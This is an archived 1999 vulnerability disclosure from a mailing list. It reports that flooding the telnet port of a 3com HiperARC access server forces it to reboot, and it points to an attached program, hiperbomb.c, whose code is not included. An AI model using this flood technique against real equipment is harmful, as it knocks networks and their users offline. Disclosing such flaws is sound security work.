3com hiperarch flaw [hiperbomb.c]


Date: Thu, 12 Aug 1999 18:10:44 -0400
From: Jonathan Chapman <jchapman@1ST.NET.>
To: [email protected]
Subject: 3com hiperarch flaw [hiperbomb.c]


---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

The attached program will reboot a 3com HiperARC.  I made an attempt to
contact 3com before posting this report; however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots.  This program is effective over all
interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
[email protected]  www.1st.net


---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="hiperbomb.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9908121810440.27775@noc.1st.net.>
Content-Description: Reboots HiperARC [kaboom]
Content-Disposition: attachment; filename="hiperbomb.c"
---254732288-1621199452-934495844=:27775--

